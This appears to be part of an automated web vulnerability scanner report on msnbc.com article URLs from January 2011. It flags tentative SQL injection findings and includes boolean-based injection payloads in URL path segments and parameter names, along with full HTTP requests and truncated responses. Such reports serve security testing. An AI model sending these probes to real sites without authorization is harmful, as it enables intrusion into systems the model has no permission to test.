HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:09:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 180628
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:129150930 --> <title>Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41327924/ns/world_news-europe/" property="og:url" /><meta content="2011-01-29T19:55:35" property="og:updated" /><meta content="Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com" name="title" /><meta content="Echoes of Egypt swirl around World Economic Forum" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="FRANK JORDANS, MATT MOORE" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Egypt, Hosni Mubarak, Davos, World Economic Forum, World News, Business, Egypt, Switzerland, Germany, France, US, Middle East, Africa, Europe, International agreements, Economy, Cabinets, Government and politics, Legislature, International relations, International Trade, General news, Economic policy, Government business and finance, Government policy, Article, Hosni Mubarak, John Kerry, Ahmed Nazif, Pascal Lamy, Ron Kirk, Angela Merkel, Wolfgang Schaeuble, Christine Lagarde, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/switzerland%20davos%20forum--1133040334_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Where anti-capitalist protesters failed at the World Economic Forum, the protests in Egypt have become the most-talked about subject at the annual Swiss Alpine retreat of global ...[SNIP]...
Request 2
GET /id/41327924/ns/world_news-europe/?143673560%20or%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:09:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 180805
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847510 --> <title>Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41327924/ns/world_news-europe/" property="og:url" /><meta content="2011-01-29T19:55:35" property="og:updated" /><meta content="Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com" name="title" /><meta content="Echoes of Egypt swirl around World Economic Forum" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="FRANK JORDANS, MATT MOORE" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Egypt, Hosni Mubarak, Davos, World Economic Forum, World News, Business, Egypt, Switzerland, Germany, France, US, Middle East, Africa, Europe, International agreements, Economy, Cabinets, Government and politics, Legislature, International relations, International Trade, General news, Economic policy, Government business and finance, Government policy, Article, Hosni Mubarak, John Kerry, Ahmed Nazif, Pascal Lamy, Ron Kirk, Angela Merkel, Wolfgang Schaeuble, Christine Lagarde, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/switzerland%20davos%20forum--1133040334_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Where anti-capitalist protesters failed at the World Economic Forum, the protests in Egypt have become the most-talked about subject at the annual Swiss Alpine retreat of globa ...[SNIP]...
1.123. http://www.msnbc.redacted/id/41328059/ns/us_news/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.msnbc.redacted
Path:
/id/41328059/ns/us_news/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41328059/ns/us_news/?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:56:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60896
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <img alt="" src="http://msnbcmedia3.redacted/j/ap/us egypt protest chicago-915503310_v2.thumb-s.jpg" width="60" height="45" /> </li>
</ul>
<h6>
<span class="label">Next story in U.S. news</span> <a href="http://www.msnbc.redacted/id/41329876/ns/us_news-life/" title="View next story"> U.S. protesters offer support for Egyptians </a> </h6> </li> <li class="label"> <span class="nib hide"></span> <a href="#slice-3" title="Jump to related">
By <span class="fn" itemprop="name" prope ...[SNIP]...
Request 2
GET /id/41328059/ns/us_news/?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:56:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60915
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <img alt="Image: Egypt's President Hosni Mubarak at the White House in Sept. 2010 with President Obama" src="http://msnbcmedia3.redacted/j/MSNBC/Components/Photo/_new/110128-obama-mubarak-2010-1p.thumb-s.jpg" width="60" height="93" /> </li>
</ul>
<h6>
<span class="label">Next story in U.S. news</span> <a href="http://www.msnbc.redacted/id/41317259/ns/politics/" title="View next story"> What the United States has at stake in Egypt </a> </h6> </li> <li class="label"> <span class="nib hide"></span> <a href="#slice-3" title="Jump to related">
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41328834/ns'%20and%201%3d1--%20/world_news-europe/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:10:07 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 55285
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847508 --> <title>Hungary hit by strongest earthquake since 1985 - World news - Europe - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41328834/ns/world_news-europe/" property="og:url" /><meta content="Mon, 28 Feb 2011 21:24:54 GMT" property="og:expires" /><meta content="unavailable_after: Mon, 28 Feb 2011 21:24:54 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T21:24:54" property="og:updated" /><meta content="Hungary hit by strongest earthquake since 1985 - World news - Europe - msnbc.com" name="title" /><meta content="Hungary hit by strongest earthquake since 1985" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Budapest, Hungary, World News, Hungary, Europe, Emergency management, Natural disasters, Government and politics, Accidents and disasters, General news, r, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="Rescue officials say parts of western Hungary and Budapest, the capital city, have been affected by a 4.8 magnitude earthquake, the strongest in the country since 1985." name="description" property="og:description" /><meta content="Mon, 28 Feb 2011 21:24:54 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 21:24:54 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41328834/ns/world_news-europe/" /> <link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
GET /id/41328834/ns'%20and%201%3d2--%20/world_news-europe/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:10:07 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 55239
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:1695234872 --> <title>Hungary hit by strongest earthquake since 1985 - World news - Europe - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41328834/ns/world_news-europe/" property="og:url" /><meta content="Mon, 28 Feb 2011 21:24:54 GMT" property="og:expires" /><meta content="unavailable_after: Mon, 28 Feb 2011 21:24:54 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T21:24:54" property="og:updated" /><meta content="Hungary hit by strongest earthquake since 1985 - World news - Europe - msnbc.com" name="title" /><meta content="Hungary hit by strongest earthquake since 1985" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Budapest, Hungary, World News, Hungary, Europe, Emergency management, Natural disasters, Government and politics, Accidents and disasters, General news, r, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="Rescue officials say parts of western Hungary and Budapest, the capital city, have been affected by a 4.8 magnitude earthquake, the strongest in the country since 1985." name="description" property="og:description" /><meta content="Mon, 28 Feb 2011 21:24:54 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 21:24:54 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41328834/ns/world_news-europe/" /> <link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41330515'%20and%201%3d1--%20/ns/us_news-life/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:13:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 65044
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847512 --> <title>SF weighs free parking for nannies - U.S. news - Life - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41330515/ns/us_news-life/" property="og:url" /><meta content="2011-01-30T00:03:37" property="og:updated" /><meta content="SF weighs free parking for nannies - U.S. news - Life - msnbc.com" name="title" /><meta content="Free parking for nannies? Maybe in San Fran " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="ROBIN HINDERY" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="San Francisco, California, Roxanne Stachon, U.S. News, California, US, Transportation, Family issues, Social affairs, Industrial products and services, Industries, Business, Government policy, Government and politics, Health care industry, General news, Article, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/nannies%20park%20free-902595433_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/nannies park free-902595433_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="One category of drivers may soon get a break, thanks to a group of local parents who are lobbying for car-owning nannies to be included in the city's residential parking permit program. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 00:03:37 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41330515/ns/us_news-life/" /> <link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img ...[SNIP]...
Request 2
GET /id/41330515'%20and%201%3d2--%20/ns/us_news-life/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:13:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 64952
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:490236436 --> <title>SF weighs free parking for nannies - U.S. news - Life - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41330515/ns/us_news-life/" property="og:url" /><meta content="2011-01-30T00:03:37" property="og:updated" /><meta content="SF weighs free parking for nannies - U.S. news - Life - msnbc.com" name="title" /><meta content="Free parking for nannies? Maybe in San Fran " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="ROBIN HINDERY" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="San Francisco, California, Roxanne Stachon, U.S. News, California, US, Transportation, Family issues, Social affairs, Industrial products and services, Industries, Business, Government policy, Government and politics, Health care industry, General news, Article, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/nannies%20park%20free-902595433_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/nannies park free-902595433_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="One category of drivers may soon get a break, thanks to a group of local parents who are lobbying for car-owning nannies to be included in the city's residential parking permit program. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 00:03:37 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41330515/ns/us_news-life/" /> <link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/a ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 85220830'%20or%201%3d1--%20 and 85220830'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id85220830'%20or%201%3d1--%20/41330876/ns/world_news-europe/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET X-Cnection: close Content-Length: 1245 Date: Sun, 30 Jan 2011 01:55:47 GMT Connection: close Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
Request 2
GET /id85220830'%20or%201%3d2--%20/41330876/ns/world_news-europe/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:55:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 99480
<html xmlns:tvservices="http://www.msnbc.com"><head><title>Page not found - About- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21731378" /><script type="text/javascript" src="/js/std.js"></script><script type="text/javascript" src="/id/23149822"></script><script type="text/javascript">gEnabled=false;</script><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.msnbc.redacted" r (nz 1vz 1lz 1oz 1cz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.msnbc.redacted" r (l 0n 0s 0v 0))"><meta name="robots" content="noindex"><meta name="description" content="Error 404"><meta name="Search.Document" content="story"><meta name="Search.Title" content="We cannot find the page you requested."><meta name="Search.Updated" content="Thu, 11 Mar 2010 22:11:14 GMT"><meta name="Search.Expires" content="Fri, 31 Dec 9999 23:59:59 GMT"><meta name="GOOGLEBOT" content="unavailable_after: 31-Dec-9999 23:59:59 GMT"><meta name="Search.Section" content="About"><link rel="alternate" type="application/rss+xml" title="MSNBC - Top msnbc.com headlines" href="http://www.msnbc.redacted/id/3032091/device/rss/rss.xml" xmlns:media="http://search.yahoo.com/mrss/" /><link rel="alternate" type="application/rss+xml" title="MSNBC - Top Stories" href="http://rss.msnbc.redacted/id/3032091/device/rss/rss.xml"><script language="javascript" type="text/javascript"> this.nm_bo = function (o) { //newsmenu delay if (nm_Enter) { window.clearTimeout(nm_Enter); nm_Enter = 0; } // Get initiating button if (o) { o2 = o.relatedTarget; o = o.target; } else { o = window.event.srcElement; o2 = window.ev ...[SNIP]...
1.127. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.msnbc.redacted
Path:
/id/41330876/ns/world_news-europe/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41330876/ns/world_news-europe/?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:55:38 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 56569
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847508 --> <title>Train crash in Germany kills 10, injures 33 - World news - Europe - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41330876/ns/world_news-europe/" property="og:url" /><meta content="Mon, 28 Feb 2011 01:22:40 GMT" property="og:expires" /><meta content="unavailable_after: Mon, 28 Feb 2011 01:22:40 GMT" name="GOOGLEBOT" /><meta content="2011-01-30T01:22:40" property="og:updated" /><meta content="Train crash in Germany kills 10, injures 33 - World news - Europe - msnbc.com" name="title" /><meta content="Train crash in Germany kills 10, injures 33" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="JUERGEN BAETZ" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Eastern Germany, Train wreck, World News, Germany, Europe, Accidents, Transportation accidents, Accidents and disasters, General news, Transportation, Industrial products and services, Industries, Business, Article, LowPri, u, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="A head-on train crash in eastern Germany killed 10 people and injured at least 33 others, eight of them severely, local firefighters said Sunday." name="description" property="og:description" /><meta content="Mon, 28 Feb 2011 01:22:40 GMT" name="Search.Expires" /><meta content="Sun, 30 Jan 2011 01:22:40 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41330876/ns/world_news-europe/" /> <link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
<link rel="stylesheet" ...[SNIP]...
Request 2
GET /id/41330876/ns/world_news-europe/?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:55:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 56523
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:1695234872 --> <title>Train crash in Germany kills 10, injures 33 - World news - Europe - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41330876/ns/world_news-europe/" property="og:url" /><meta content="Mon, 28 Feb 2011 01:22:40 GMT" property="og:expires" /><meta content="unavailable_after: Mon, 28 Feb 2011 01:22:40 GMT" name="GOOGLEBOT" /><meta content="2011-01-30T01:22:40" property="og:updated" /><meta content="Train crash in Germany kills 10, injures 33 - World news - Europe - msnbc.com" name="title" /><meta content="Train crash in Germany kills 10, injures 33" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="JUERGEN BAETZ" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Eastern Germany, Train wreck, World News, Germany, Europe, Accidents, Transportation accidents, Accidents and disasters, General news, Transportation, Industrial products and services, Industries, Business, Article, LowPri, u, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="A head-on train crash in eastern Germany killed 10 people and injured at least 33 others, eight of them severely, local firefighters said Sunday." name="description" property="og:description" /><meta content="Mon, 28 Feb 2011 01:22:40 GMT" name="Search.Expires" /><meta content="Sun, 30 Jan 2011 01:22:40 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41330876/ns/world_news-europe/" /> <link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
<link rel="stylesheet" ...[SNIP]...
